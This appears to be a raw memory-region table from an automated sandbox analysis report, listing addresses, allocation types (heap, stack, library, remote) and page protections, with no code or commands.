page read and write
BAF9000
trusted library allocation
page read and write
69B7000
heap
page read and write
6C10000
heap
page read and write
69B3000
heap
page read and write
69B3000
heap
page read and write
4A70000
heap
page read and write
78180059C000
trusted library allocation
page read and write
874B000
heap
page read and write
781C04100000
trusted library allocation
page read and write
781C034E8000
trusted library allocation
page read and write
69C2000
heap
page read and write
6E98000
trusted library allocation
page read and write
7780000
trusted library allocation
page read and write
6AD0000
remote allocation
page read and write
21888F95000
heap
page read and write
2188EB84000
heap
page read and write
21888F8D000
heap
page read and write
68F000
heap
page read and write
781C03804000
trusted library allocation
page read and write
67E3000
trusted library allocation
page read and write
781C03DF4000
trusted library allocation
page read and write
69B3000
heap
page read and write
69B5000
heap
page read and write
B181000
heap
page read and write
69B9000
heap
page read and write
4590000
heap
page read and write
781C02454000
trusted library allocation
page read and write
69B3000
heap
page read and write
781C02898000
trusted library allocation
page read and write
570000
heap
page read and write
71C0000
heap
page execute and read and write
2188EB61000
heap
page read and write
781C03E90000
trusted library allocation
page read and write
781C030EC000
trusted library allocation
page read and write
A0E000
stack
page read and write
69B5000
heap
page read and write
781C026B8000
trusted library allocation
page read and write
781C02B98000
trusted library allocation
page read and write
69B3000
heap
page read and write
781C02591000
trusted library allocation
page read and write
69B9000
heap
page read and write
6E87000
trusted library allocation
page read and write
6FA0000
heap
page read and write
6C52000
heap
page read and write
7818005B8000
trusted library allocation
page read and write
298800018000
trusted library allocation
page read and write
B983000
trusted library allocation
page read and write
781C03720000
trusted library allocation
page read and write
77F0000
trusted library allocation
page read and write
68CE000
stack
page read and write
781C023C8000
trusted library allocation
page read and write
781C02728000
trusted library allocation
page read and write
59BE000
stack
page read and write
69B3000
heap
page read and write
4E8C000
trusted library allocation
page read and write
69B3000
heap
page read and write
2188EBB7000
heap
page read and write
6CA4000
heap
page read and write
AE4000
trusted library allocation
page read and write
B180000
heap
page read and write
6E97000
trusted library allocation
page read and write
69B9000
heap
page read and write
8200000
trusted library allocation
page execute and read and write
78180011C000
trusted library allocation
page read and write
3BC000
stack
page read and write
21888F99000
heap
page read and write
693000
heap
page read and write
69B9000
heap
page read and write
6E8D000
trusted library allocation
page read and write
2188957C000
heap
page read and write
B8C0000
trusted library allocation
page read and write
6F4F000
trusted library allocation
page read and write
5A0000
heap
page read and write
6F3F000
trusted library allocation
page read and write
781800601000
trusted library allocation
page read and write
781C036DD000
trusted library allocation
page read and write
B983000
trusted library allocation
page read and write
781C03CE0000
trusted library allocation
page read and write
781800094000
trusted library allocation
page read and write
781C035D8000
trusted library allocation
page read and write
218894D0000
heap
page read and write
B3AD000
heap
page read and write
31D0000
heap
page read and write
69B5000
heap
page read and write
6C50000
trusted library allocation
page read and write
5018000
heap
page read and write
57639FD000
stack
page read and write
781C03D60000
trusted library allocation
page read and write
57539FB000
stack
page read and write
781C026D0000
trusted library allocation
page read and write
781C03801000
trusted library allocation
page read and write
69B3000
heap
page read and write
B159000
heap
page read and write
8A0C000
stack
page read and write
B7AE000
trusted library allocation
page read and write
781C033CC000
trusted library allocation
page read and write
6962000
heap
page read and write
448C000
stack
page read and write
AE3000
trusted library allocation
page execute and read and write
781C03C8C000
trusted library allocation
page read and write
69B5000
heap
page read and write
6F4F000
trusted library allocation
page read and write
3142000
heap
page read and write
781C025A4000
trusted library allocation
page read and write
6CE0000
heap
page read and write
6C28000
heap
page read and write
51D4000
heap
page read and write
4C12000
trusted library allocation
page read and write
21888F9B000
heap
page read and write
B1DA000
heap
page read and write
879000
trusted library allocation
page read and write
6F4F000
trusted library allocation
page read and write
B0F9000
heap
page read and write
69C7000
heap
page read and write
781C03970000
trusted library allocation
page read and write
6C9B000
heap
page read and write
781C02968000
trusted library allocation
page read and write
629000
heap
page read and write
781C03AD0000
trusted library allocation
page read and write
781C02928000
trusted library allocation
page read and write
83EE000
stack
page read and write
31D0000
heap
page read and write
781C02594000
trusted library allocation
page read and write
21888F83000
heap
page read and write
781C040FC000
trusted library allocation
page read and write
7570000
trusted library allocation
page read and write
781800650000
trusted library allocation
page read and write
87C000
heap
page read and write
B461000
heap
page read and write
6C46000
heap
page read and write
7040000
heap
page read and write
6B3C000
stack
page read and write
21888F9B000
heap
page read and write
2188EB54000
heap
page read and write
781C03F50000
trusted library allocation
page read and write
781C02A5B000
trusted library allocation
page read and write
69B0000
heap
page read and write
69B9000
heap
page read and write
21888F90000
heap
page read and write
781C03601000
trusted library allocation
page read and write
781C02480000
trusted library allocation
page read and write
781C03497000
trusted library allocation
page read and write
525E000
trusted library allocation
page read and write
781800198000
trusted library allocation
page read and write
21888F93000
heap
page read and write
7818006B0000
trusted library allocation
page read and write
7B70000C0000
direct allocation
page read and write
69B3000
heap
page read and write
781C02478000
trusted library allocation
page read and write
69B3000
heap
page read and write
781800134000
trusted library allocation
page read and write
781C02A55000
trusted library allocation
page read and write
6F4F000
trusted library allocation
page read and write
7818005D8000
trusted library allocation
page read and write
B461000
heap
page read and write
21888F9F000
heap
page read and write
5290000
trusted library allocation
page read and write
781800634000
trusted library allocation
page read and write
3087000
trusted library allocation
page read and write
731C000
stack
page read and write
781C039F4000
trusted library allocation
page read and write
781C031E8000
trusted library allocation
page read and write
7B70000A4000
direct allocation
page read and write
69B9000
heap
page read and write
940000
trusted library allocation
page execute and read and write
21888F9B000
heap
page read and write
31DA000
heap
page read and write
781800138000
trusted library allocation
page read and write
B37A000
heap
page read and write
8350000
trusted library allocation
page execute and read and write
781C03E54000
trusted library allocation
page read and write
781C03684000
trusted library allocation
page read and write
7818005E8000
trusted library allocation
page read and write
781C02E48000
trusted library allocation
page read and write
781C02CB0000
trusted library allocation
page read and write
69B3000
heap
page read and write
781C024AC000
trusted library allocation
page read and write
781C040E0000
trusted library allocation
page read and write
69B5000
heap
page read and write
6E94000
trusted library allocation
page read and write
2188EBA6000
heap
page read and write
BAF9000
trusted library allocation
page read and write
781C03F8C000
trusted library allocation
page read and write
781C03404000
trusted library allocation
page read and write
2188EBE7000
heap
page read and write
781C03214000
trusted library allocation
page read and write
BAFD000
trusted library allocation
page read and write
7B70000D4000
direct allocation
page read and write
781C023BC000
trusted library allocation
page read and write
781C037C4000
trusted library allocation
page read and write
781C041B8000
trusted library allocation
page read and write
8166000
heap
page read and write
6985000
heap
page read and write
69B9000
heap
page read and write
781C02214000
trusted library allocation
page read and write
781C03C01000
trusted library allocation
page read and write
69AE000
heap
page read and write
69B9000
heap
page read and write
7B70000E4000
direct allocation
page read and write
4CC1000
trusted library allocation
page read and write
6BF0000
trusted library allocation
page read and write
8210000
trusted library allocation
page read and write
6C9B000
heap
page read and write
57679FF000
stack
page read and write
781C03D78000
trusted library allocation
page read and write
50A0000
heap
page read and write
7F80000
trusted library allocation
page execute and read and write
781C0286C000
trusted library allocation
page read and write
B409000
heap
page read and write
218858AD000
heap
page read and write
8478000
heap
page read and write
B983000
trusted library allocation
page read and write
74C6000
trusted library allocation
page read and write
7310000
trusted library allocation
page execute and read and write
6DFE000
heap
page read and write
781800080000
trusted library allocation
page read and write
2188EB20000
heap
page read and write
781C033CC000
trusted library allocation
page read and write
31D0000
heap
page read and write
B15C000
heap
page read and write
6C56000
heap
page read and write
6C4B000
heap
page read and write
2188F7F0000
heap
page read and write
4C64000
trusted library allocation
page read and write
6C80000
trusted library allocation
page read and write
21888F9B000
heap
page read and write
6E11000
heap
page read and write
350F000
stack
page read and write
781C02282000
trusted library allocation
page read and write
6DEB000
heap
page read and write
69B9000
heap
page read and write
BB03000
trusted library allocation
page read and write
82BB000
heap
page read and write
781C02686000
trusted library allocation
page read and write
6C42000
heap
page read and write
6C5C000
heap
page read and write
781800134000
trusted library allocation
page read and write
69CF000
heap
page read and write
6971000
heap
page read and write
69B9000
heap
page read and write
69B9000
heap
page read and write
B983000
trusted library allocation
page read and write
684B000
stack
page read and write
83BC000
stack
page read and write
55FC000
stack
page read and write
6CAF000
heap
page read and write
B0A000
trusted library allocation
page execute and read and write
77A8000
trusted library allocation
page read and write
7F9000
heap
page read and write
6940000
heap
page execute and read and write
8203000
heap
page read and write
7818006BF000
trusted library allocation
page read and write
781C040D0000
trusted library allocation
page read and write
B983000
trusted library allocation
page read and write
781C03001000
trusted library allocation
page read and write
867C000
heap
page read and write
69B9000
heap
page read and write
4A2C000
stack
page read and write
781C0413C000
trusted library allocation
page read and write
6DE000
stack
page read and write
91E000
stack
page read and write
69B3000
heap
page read and write
6CE0000
heap
page read and write
B073000
heap
page read and write
2188EB2E000
heap
page read and write
3065000
heap
page read and write
7B7000088000
direct allocation
page read and write
781C036B8000
trusted library allocation
page read and write
890000
trusted library allocation
page read and write
781C03D14000
trusted library allocation
page read and write
B1B5000
heap
page read and write
57571FE000
stack
page read and write
B983000
trusted library allocation
page read and write
781C03914000
trusted library allocation
page read and write
781C040DC000
trusted library allocation
page read and write
781C034B8000
trusted library allocation
page read and write
781C03E1C000
trusted library allocation
page read and write
69B9000
heap
page read and write
B174000
heap
page read and write
2188EB84000
heap
page read and write
6997000
heap
page read and write
69B9000
heap
page read and write
781C02A74000
trusted library allocation
page read and write
781C03FA0000
trusted library allocation
page read and write
6CB8000
heap
page read and write
B983000
trusted library allocation
page read and write
74EF000
trusted library allocation
page read and write
525E000
trusted library allocation
page read and write
781C02490000
trusted library allocation
page read and write
B097000
heap
page read and write
6C5A000
heap
page read and write
781800648000
trusted library allocation
page read and write
69B3000
heap
page read and write
6C42000
heap
page read and write
6C3E000
heap
page read and write
5ABF000
stack
page read and write
781C02784000
trusted library allocation
page read and write
781C02664000
trusted library allocation
page read and write
31D9000
heap
page read and write
83AE000
stack
page read and write
781C0326C000
trusted library allocation
page read and write
21885833000
heap
page read and write
69B5000
heap
page read and write
69B5000
heap
page read and write
69B9000
heap
page read and write
69B9000
heap
page read and write
6F4F000
trusted library allocation
page read and write
88A000
trusted library allocation
page execute and read and write
69B5000
heap
page read and write
526E000
trusted library allocation
page read and write
781C03D98000
trusted library allocation
page read and write
864E000
stack
page read and write
2188EBAD000
heap
page read and write
6F4F000
trusted library allocation
page read and write
6C5C000
heap
page read and write
69B5000
heap
page read and write
6C3B000
heap
page read and write
6CC3000
heap
page read and write
69B3000
heap
page read and write
7818005F0000
trusted library allocation
page read and write
781800174000
trusted library allocation
page read and write
51E5000
heap
page read and write
781C03A04000
trusted library allocation
page read and write
781C02B10000
trusted library allocation
page read and write
781C03AE4000
trusted library allocation
page read and write
781C03D24000
trusted library allocation
page read and write
2188EBA6000
heap
page read and write
6C69000
heap
page read and write
781C03544000
trusted library allocation
page read and write
781C0344C000
trusted library allocation
page read and write
781C02C01000
trusted library allocation
page read and write
781C02728000
trusted library allocation
page read and write
21888F93000
heap
page read and write
298800054000
trusted library allocation
page read and write
781C02404000
trusted library allocation
page read and write
452000
remote allocation
page execute and read and write
781C02BD8000
trusted library allocation
page read and write
2188F9B0000
trusted library section
page read and write
B983000
trusted library allocation
page read and write
6E8C000
trusted library allocation
page read and write
781C031DC000
trusted library allocation
page read and write
781C02EC4000
trusted library allocation
page read and write
D6C000
stack
page read and write
6D4A000
heap
page read and write
781C041E0000
trusted library allocation
page read and write
781800510000
trusted library allocation
page read and write
2188EBDB000
heap
page read and write
6F4F000
trusted library allocation
page read and write
781C02710000
trusted library allocation
page read and write
82B0000
heap
page read and write
781C024A4000
trusted library allocation
page read and write
69B9000
heap
page read and write
6C66000
heap
page read and write
781C03DB8000
trusted library allocation
page read and write
2188EBE7000
heap
page read and write
6C30000
heap
page read and write
781C02728000
trusted library allocation
page read and write
B180000
heap
page read and write
3F8000
stack
page read and write
2188EBE7000
heap
page read and write
8400000
trusted library allocation
page read and write
B079000
heap
page read and write
6CAA000
heap
page read and write
781C02700000
trusted library allocation
page read and write
69B3000
heap
page read and write
B45B000
heap
page read and write
597F000
stack
page read and write
There are 2628 hidden memdumps, click here to show them.